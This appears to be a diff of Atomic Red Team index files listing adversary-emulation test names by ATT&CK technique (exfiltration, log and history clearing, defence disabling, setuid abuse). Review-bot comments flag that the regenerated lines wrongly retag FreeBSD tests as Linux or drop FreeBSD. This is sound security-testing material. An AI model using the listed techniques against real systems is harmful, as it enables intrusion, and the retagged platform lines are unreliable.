execution,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
execution,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
execution,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
@@ -316,18 +422,26 @@ execution,T1059.004,Command and Scripting Interpreter: Bash,6,What shell is runn
execution,T1059.004,Command and Scripting Interpreter: Bash,7,What shells are available,bf23c7dc-1004-4949-8262-4c1d1ef87702,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,8,Command line scripts,b04ed73c-7d43-4dc8-b563-a2fc595cba1a,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,9,Obfuscated command line scripts,5bec4cc8-f41e-437b-b417-33ff60acf9af,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,10,Obfuscated command line scripts (freebsd),5dc1d9dd-f396-4420-b985-32b1c4f79062,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,11,Change login shell,c7ac59cb-13cc-4622-81dc-6d2fee9bfac7,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,12,Change login shell (freebsd),33b68b9b-4988-4caf-9600-31b7bf04227c,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,13,Environment variable scripts,bdaebd56-368b-4970-a523-f905ff4a8a51,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,14,Environment variable scripts (freebsd),663b205d-2121-48a3-a6f9-8c9d4d87dfee,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,15,Detecting pipe-to-shell,fca246a8-a585-4f28-a2df-6495973976a1,bash
execution,T1059.004,Command and Scripting Interpreter: Bash,16,Detecting pipe-to-shell (freebsd),1a06b1ec-0cca-49db-a222-3ebb6ef25632,sh
execution,T1059.004,Command and Scripting Interpreter: Bash,17,Current kernel information enumeration,3a53734a-9e26-4f4b-ad15-059e767f5f14,sh
execution,T1059.006,Command and Scripting Interpreter: Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
execution,T1059.006,Command and Scripting Interpreter: Python,2,Execute Python via scripts,6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
execution,T1059.006,Command and Scripting Interpreter: Python,3,Execute Python via Python executables,0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
execution,T1059.006,Command and Scripting Interpreter: Python,4,Python pty module and spawn function used to spawn sh or bash,161d694c-b543-4434-85c3-c3a433e33792,sh
execution,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
execution,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,"Exfiltrate data HTTPS using curl freebsd,linux or macos",4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
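Review bot: typo in test #1 of T1059.006: `Execute shell script via python's command mode arguement` should be "argument". As this CSV is generated from the atomic's YAML, the correction belongs in the test definition so it is not lost on the next regeneration.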
@@ -335,3 +449,4 @@ exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c5
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,8,Python3 http.server,3ea1f938-f80a-4305-9aa8-431bc4867313,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,9,Python3 http.server (freebsd),57a303a2-0bc6-400d-b144-4f3292920a0b,sh
@@ -24,25 +24,25 @@
- T1150 Plist Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM rule (freebsd) [freebsd]
- Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- Atomic Test #3: Malicious PAM module [linux]
- T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md)
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux]
- Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos]
- Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos]
- Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos]
- Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos]
- Atomic Test #5: chown - Change file or folder ownership and group [macos, linux]
- Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux]
- Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos]
- Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux]
- Atomic Test #9: chattr - Remove immutable file attribute [macos, linux]
- Atomic Test #10: chflags - Remove immutable file attribute [freebsd]
- Atomic Test #10: chflags - Remove immutable file attribute [linux]
- Atomic Test #11: Chmod through c script [macos, linux]
- Atomic Test #12: Chmod through c script (freebsd) [freebsd]
- Atomic Test #12: Chmod through c script (freebsd) [linux]
- Atomic Test #13: Chown through c script [macos, linux]
- Atomic Test #14: Chown through c script (freebsd) [freebsd]
- Atomic Test #14: Chown through c script (freebsd) [linux]
- [T1216.001 Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
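Review bot: test #7 of T1222.002 is named `chown - Change file or folder mode ownership only`; "mode" reads as a leftover from the chmod entries above it and does not describe a chown test. Suggest `chown - Change file or folder ownership only`, fixed in the test YAML, to match the wording of tests #5, #6 and #8 in the same list.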
@@ -84,11 +84,11 @@
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
|
||||
- Atomic Test #1: Sudo usage [macos, linux]
|
||||
- Atomic Test #2: Sudo usage (freebsd) [freebsd]
|
||||
- Atomic Test #2: Sudo usage (freebsd) [linux]
|
||||
- Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
|
||||
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [freebsd]
|
||||
- Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
|
||||
- Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
|
||||
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [freebsd]
|
||||
- Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
|
||||
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
|
||||
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
|
||||
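Review bot: `Atomic Test #2: Sudo usage (freebsd)`, `#4: Unlimited sudo cache timeout (freebsd)` and `#6: Disable tty_tickets for sudo caching (freebsd)` each change from `[freebsd]` to `[linux]`, so T1548.003 now lists a Linux-tagged test whose own name says FreeBSD right under its Linux/macOS counterpart (#1, #3, #5). The identical three-line change appears again for the second T1548.003 entry later in this diff (hunk @@ -855), which points to a systematic regeneration rather than a manual edit; the supported_platforms field of those three test YAMLs, or the generator's platform list, is what needs checking.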
@@ -99,7 +99,7 @@
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd]
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- Atomic Test #2: Masquerade as a built-in system executable [windows]
- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
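Review bot: here freebsd is dropped rather than replaced: `Atomic Test #1: Execute a process from a directory masquerading as the current parent directory.` goes from `[macos, linux, freebsd]` to `[macos, linux]`. Unlike the `(freebsd)`-named tests elsewhere in this diff, this is a genuinely multi-platform test, so the change silently removes FreeBSD coverage instead of mislabelling it; confirm that the YAML's supported_platforms was actually meant to change before accepting the regenerated line.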
@@ -118,24 +118,24 @@
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [freebsd]
- Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
- Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1070.002 Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: rm -rf [freebsd]
- Atomic Test #2: rm -rf [linux]
- Atomic Test #3: Delete log files using built-in log utility [macos]
- Atomic Test #4: Truncate system log files via truncate utility [macos]
- Atomic Test #5: Truncate system log files via truncate utility (freebsd) [freebsd]
- Atomic Test #5: Truncate system log files via truncate utility (freebsd) [linux]
- Atomic Test #6: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
- Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [freebsd]
- Atomic Test #7: Delete log files via cat utility by appending /dev/null or /dev/zero (freebsd) [linux]
- Atomic Test #8: System log file deletion via find utility [macos]
- Atomic Test #9: Overwrite macOS system log via echo utility [macos]
- Atomic Test #10: Overwrite FreeBSD system log via echo utility [freebsd]
- Atomic Test #10: Overwrite FreeBSD system log via echo utility [linux]
- Atomic Test #11: Real-time system log clearance/deletion [macos]
- Atomic Test #12: Delete system log files via unlink utility [macos]
- Atomic Test #13: Delete system log files via unlink utility (freebsd) [freebsd]
- Atomic Test #13: Delete system log files via unlink utility (freebsd) [linux]
- Atomic Test #14: Delete system log files using shred utility [macos]
- Atomic Test #15: Delete system log files using srm utility [macos]
- Atomic Test #16: Delete system log files using OSAScript [macos]
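Review bot: this hunk produces index entries that differ only in their number: `Atomic Test #1: rm -rf [macos, linux]` is now followed by `Atomic Test #2: rm -rf [linux]`, and `Atomic Test #2: Detect Virtualization Environment (FreeBSD)` and `#10: Overwrite FreeBSD system log via echo utility` are tagged `[linux]` although their names state the platform. A reader can no longer tell which of the two `rm -rf` entries is the FreeBSD one, and a runner filtering on platform will pick the FreeBSD variants up on Linux hosts. Restore the `[freebsd]` tags (or teach the generator the platform) rather than merging the regenerated lines.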
@@ -183,21 +183,21 @@
- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear sh history (rm) [freebsd]
- Atomic Test #2: Clear sh history (rm) [linux]
- Atomic Test #3: Clear Bash history (echo) [linux]
- Atomic Test #4: Clear sh history (echo) [freebsd]
- Atomic Test #4: Clear sh history (echo) [linux]
- Atomic Test #5: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #6: Clear sh history (cat dev/null) [freebsd]
- Atomic Test #6: Clear sh history (cat dev/null) [linux]
- Atomic Test #7: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #8: Clear sh history (ln dev/null) [freebsd]
- Atomic Test #8: Clear sh history (ln dev/null) [linux]
- Atomic Test #9: Clear Bash history (truncate) [linux]
- Atomic Test #10: Clear sh history (truncate) [freebsd]
- Atomic Test #10: Clear sh history (truncate) [linux]
- Atomic Test #11: Clear history of a bunch of shells [linux, macos]
- Atomic Test #12: Clear history of a bunch of shells (freebsd) [freebsd]
- Atomic Test #12: Clear history of a bunch of shells (freebsd) [linux]
- Atomic Test #13: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #15: Disable Bash History Logging with SSH -T [linux]
- Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [freebsd]
- Atomic Test #16: Disable sh History Logging with SSH -T (freebsd) [linux]
- Atomic Test #17: Prevent Powershell History Logging [windows]
- Atomic Test #18: Clear Powershell History by Deleting History File [windows]
- Atomic Test #19: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
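Review bot: every `Clear sh history (...)` test in this hunk (#2, #4, #6, #8, #10, #12 and #16) is retagged from `[freebsd]` to `[linux]`, which places each one beside the bash test it mirrors (#1, #3, #5, #7, #9, #11, #15) with the same platform. The sh variants carry `(freebsd)` in their names because they target a different default shell on a different OS; once tagged linux nothing in the index records that. Keep `[freebsd]` on the sh entries.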
@@ -209,12 +209,12 @@
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos]
- Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos]
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Base64 decoding with shell utilities (freebsd) [freebsd]
- Atomic Test #7: FreeBSD b64encode Shebang in CLI [freebsd]
- Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos]
- Atomic Test #6: Base64 decoding with shell utilities (freebsd) [linux]
- Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux]
- Atomic Test #8: Hex decoding with shell utilities [linux, macos]
- Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #10: XOR decoding and command execution using Python [linux, macos]
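Review bot: the T1140 block mixes both failure modes: Tests #3, #4 and #8 lose a platform (`[freebsd, linux, macos]` to `[linux, macos]`), while #6 and #7 are mislabelled (`[freebsd]` to `[linux]`). The result is `Atomic Test #7: FreeBSD b64encode Shebang in CLI [linux]` sitting two lines above `Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos]`, two shebang tests named for different operating systems now claiming the same platform. At minimum #7 should keep `[freebsd]`, and #3/#4/#8 should keep it in their lists.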
@@ -256,10 +256,10 @@
- Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
- Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
- Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
@@ -292,11 +292,11 @@
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start Packet Filter [freebsd]
- Atomic Test #8: Stop/Start Packet Filter [linux]
- Atomic Test #9: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #10: Turn off UFW logging [linux]
- Atomic Test #11: Add and delete UFW firewall rules [linux]
- Atomic Test #12: Add and delete Packet Filter rules [freebsd]
- Atomic Test #12: Add and delete Packet Filter rules [linux]
- Atomic Test #13: Edit UFW firewall user.rules file [linux]
- Atomic Test #14: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #15: Edit UFW firewall sysctl.conf file [linux]
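Review bot: `Atomic Test #8: Stop/Start Packet Filter` and `#12: Add and delete Packet Filter rules` change from `[freebsd]` to `[linux]`, but Packet Filter (pf) is the FreeBSD firewall and the Linux counterparts are the UFW tests already tagged `[linux]` around them (#7, #9, #10, #11, #13 to #15). Tagging the pf tests linux means a Linux run selects firewall tests for a firewall the host does not have; keep `[freebsd]` on #8 and #12.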
@@ -381,8 +381,8 @@
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
@@ -407,15 +407,15 @@
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Make and modify binary from C source (freebsd) [freebsd]
- Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- Atomic Test #3: Set a SetUID flag on file [macos, linux]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [freebsd]
- Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- Atomic Test #5: Set a SetGID flag on file [macos, linux]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [freebsd]
- Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- Atomic Test #7: Make and modify capabilities of a binary [linux]
- Atomic Test #8: Provide the SetUID capability to a file [linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [freebsd, linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [freebsd, linux]
- Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
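Review bot: the two reconnaissance tests (#9 setuid, #10 setgid) change from `[freebsd, linux]` to `[linux]`, a coverage loss, while #2, #4 and #6 (each named `... (freebsd)`) change from `[freebsd]` to `[linux]`, a mislabel. Both patterns in one hunk show freebsd being stripped wholesale from supported_platforms when this index is built, and the identical hunk @@ -954 for the privilege-escalation copy of T1548.001 confirms it. This should be fixed at the source (generator or YAML) rather than merged as regenerated output.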
@@ -430,9 +430,9 @@
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [freebsd]
- Atomic Test #2: Auditing Configuration Changes on FreeBSD Host [linux]
- Atomic Test #3: Logging Configuration Changes on Linux Host [linux]
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host [freebsd]
- Atomic Test #4: Logging Configuration Changes on FreeBSD Host [linux]
- Atomic Test #5: Disable Powershell ETW Provider - Windows [windows]
- Atomic Test #6: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
- Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
@@ -497,14 +497,14 @@
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Disable history collection (freebsd) [freebsd]
- Atomic Test #2: Disable history collection (freebsd) [linux]
- Atomic Test #3: Mac HISTCONTROL [macos, linux]
- Atomic Test #4: Clear bash history [linux]
- Atomic Test #5: Setting the HISTCONTROL environment variable [linux]
- Atomic Test #6: Setting the HISTFILESIZE environment variable [linux]
- Atomic Test #7: Setting the HISTSIZE environment variable [freebsd]
- Atomic Test #7: Setting the HISTSIZE environment variable [linux]
- Atomic Test #8: Setting the HISTFILE environment variable [linux]
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [freebsd]
- Atomic Test #9: Setting the HISTFILE environment variable (freebsd) [linux]
- Atomic Test #10: Setting the HISTIGNORE environment variable [linux]
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -539,7 +539,7 @@
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable syslog (freebsd) [freebsd]
- Atomic Test #2: Disable syslog (freebsd) [linux]
- Atomic Test #3: Disable Cb Response [linux]
- Atomic Test #4: Disable SELinux [linux]
- Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux]
@@ -580,7 +580,7 @@
- Atomic Test #40: Suspend History [linux]
- Atomic Test #41: Reboot Linux Host via Kernel System Request [linux]
- Atomic Test #42: Clear Pagging Cache [linux]
- Atomic Test #43: Disable Memory Swap [freebsd, linux]
- Atomic Test #43: Disable Memory Swap [linux]
- Atomic Test #44: Disable Hypervisor-Enforced Code Integrity (HVCI) [windows]
- Atomic Test #45: AMSI Bypass - Override AMSI via COM [windows]
- Atomic Test #46: AWS - GuardDuty Suspension or Deletion [iaas:aws]
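Review bot: `Atomic Test #43: Disable Memory Swap` goes from `[freebsd, linux]` to `[linux]`; it is the only change in this hunk and it removes a platform from a test that supported both. Unless the test was found not to work on FreeBSD, the `[freebsd, linux]` tag should stay.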
@@ -596,7 +596,7 @@
- T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- Atomic Test #2: Decode base64 Data into Script [freebsd]
- Atomic Test #2: Decode base64 Data into Script [linux]
- Atomic Test #3: Execute base64-encoded PowerShell [windows]
- Atomic Test #4: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #5: Execution from Compressed File [windows]
@@ -625,7 +625,7 @@
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [freebsd, linux]
- Atomic Test #2: Masquerading as FreeBSD or Linux crond process. [linux]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
@@ -646,7 +646,7 @@
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on FreeBSD [freebsd]
- Atomic Test #2: Install root CA on FreeBSD [linux]
- Atomic Test #3: Install root CA on Debian/Ubuntu [linux]
- Atomic Test #4: Install root CA on macOS [macos]
- Atomic Test #5: Install root CA on Windows [windows]
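Review bot: `Atomic Test #2: Install root CA on FreeBSD` is retagged `[linux]`, but this technique's entries are split per operating system precisely because trust-store locations and tooling differ (#1 CentOS/RHEL, #3 Debian/Ubuntu, #4 macOS, #5 Windows). A FreeBSD trust-store procedure tagged linux will not do what the index promises on a Linux host; keep `[freebsd]` on #2.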
@@ -655,9 +655,9 @@
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- Atomic Test #3: C compile [freebsd, linux, macos]
- Atomic Test #4: CC compile [freebsd, linux, macos]
- Atomic Test #5: Go compile [freebsd, linux, macos]
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
@@ -697,15 +697,15 @@
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
- Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
